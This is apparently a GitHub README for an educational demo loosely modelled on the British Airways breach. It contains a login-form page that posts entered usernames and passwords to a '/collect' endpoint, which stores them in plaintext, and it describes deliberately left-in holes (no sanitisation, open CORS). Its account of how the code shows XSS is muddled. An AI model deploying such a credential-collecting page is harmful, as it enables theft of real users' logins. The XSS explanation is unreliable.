This project is intended for educational purposes only. Cross-Site Scripting (XSS) is a security vulnerability that should only be tested responsibly and with proper authorization. Unauthorized testing of XSS vulnerabilities is illegal and unethical.
This project demonstrates a Cross-Site Scripting (XSS) attack using a simple login form. The server collects login data and saves it to a JSON file.
- Ensure you have Node.js installed on your machine. You can download it from Node.js.
- Ensure you have Git installed on your machine. You can download it from Git.
- Clone the repository to your local machine.
- Navigate to the project directory.
- Install the dependencies by running the following command:

  ```
  npm install
  ```
- It is recommended to run this project in a local or isolated environment due to potentially sensitive login data. But you can run on GitHub Codespace as well.
- Start the server by running the following command:

  ```
  node server.js
  ```
```html
<!-- jQuery is required by the script below ($.ajax, $('#...').val()); the page
     must load it before the inline script runs. -->
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>

<form id="loginForm">
  <label for="username">Username:</label>
  <input type="text" id="username" name="username" required><br><br>
  <label for="password">Password:</label>
  <input type="password" id="password" name="password" required><br><br>
  <button type="button" id="loginButton">Login</button>
</form>

<script>
  // Endpoint exposed by server.js; replace the workspace name with your own.
  const apiUrl = 'https://unearthly-hex-679pp459qqgh574r-8001.app.github.dev/collect';

  function sendLoginToAPI(event) {
    event.preventDefault();
    alert("Login button clicked!");

    // Read the raw field values; nothing is validated or encoded here.
    const username = $('#username').val();
    const password = $('#password').val();
    if (!username || !password) {
      alert("Both username and password are required.");
      return;
    }

    // POST the credentials as JSON to the /collect endpoint.
    $.ajax({
      url: apiUrl,
      method: 'POST',
      contentType: 'application/json',
      data: JSON.stringify({ username: username, password: password }),
      success: function(data) {
        console.log('Login response:', data);
        alert('Login successful!');
      },
      error: function(xhr, status, error) {
        console.error('Login failed:', error);
        alert('Invalid username or password.');
      }
    });
  }

  // Bound to mousedown rather than click, so it fires as soon as the button is pressed.
  $('#loginButton').on('mousedown', sendLoginToAPI);
</script>
```
Change your workspace name to your own workspace name in the apiUrl variable.
The client-side code handles the user input from the login form. When the login button is clicked, the `sendLoginToAPI` function is triggered. This function collects the username and password entered by the user and sends them to the server using an AJAX POST request. The server then processes this data and saves it to a JSON file. The XSS vulnerability could be exploited if an attacker injects malicious scripts into the username or password fields, which would then be executed when the data is processed or displayed.
View Demo Video: XSS.Demo.mp4
In 2018, British Airways experienced a significant data breach that affected approximately 400,000 customers. The breach was a result of attackers exploiting vulnerabilities in the British Airways website, allowing them to steal sensitive customer information, including personal and financial data. The incident highlighted the importance of robust security measures to protect user data and prevent unauthorized access.
This project simulates the British Airways data breach by demonstrating several key vulnerabilities that were present in the actual incident. Here are the specific ways in which this project mirrors the British Airways data breach:
- Cross-Site Scripting (XSS): The project demonstrates how an attacker can inject malicious scripts into the username or password fields of a login form. This is similar to how attackers exploited vulnerabilities in the British Airways website to steal customer data. The client-side code in `client_code.html` and the server-side code in `server.js` illustrate this vulnerability.
- Insecure Data Storage: The project saves login data, including usernames and passwords, to a JSON file (`users.json`) without any encryption or hashing. This mirrors the lack of proper data protection measures that contributed to the British Airways data breach.
- Lack of Input Validation: The server-side code in `server.js` performs only basic validation for the presence of username and password fields. It does not sanitize or validate the input to prevent malicious data from being processed, similar to the insufficient input validation that allowed attackers to exploit the British Airways website.
- CORS Misconfiguration: The server in `server.js` enables CORS (Cross-Origin Resource Sharing) without any restrictions, which can allow unauthorized domains to interact with the server and potentially exploit vulnerabilities. This is akin to the misconfigurations that can lead to data breaches like the one experienced by British Airways.
These vulnerabilities highlight the importance of implementing proper security measures, such as input validation, data encryption, and secure CORS configurations, to protect against attacks and ensure the safety of user data.
For more information about the British Airways data breach, you can refer to the following links:
- British Airways hacked, hundreds of thousands of credit card numbers stolen
- British Airways fined £20m over data breach
- British Airways data breach: What you need to know
- British Airways data breach: What happened and what to do
These articles provide comprehensive insights into the breach, its impact, and the subsequent actions taken.
- Fork the repository.
- Create a new branch for your feature or bugfix.
- Commit your changes with a descriptive message.
- Push your changes to your forked repository.
- Create a pull request to the main repository.
This project is licensed under the Apache License, Version 2.0.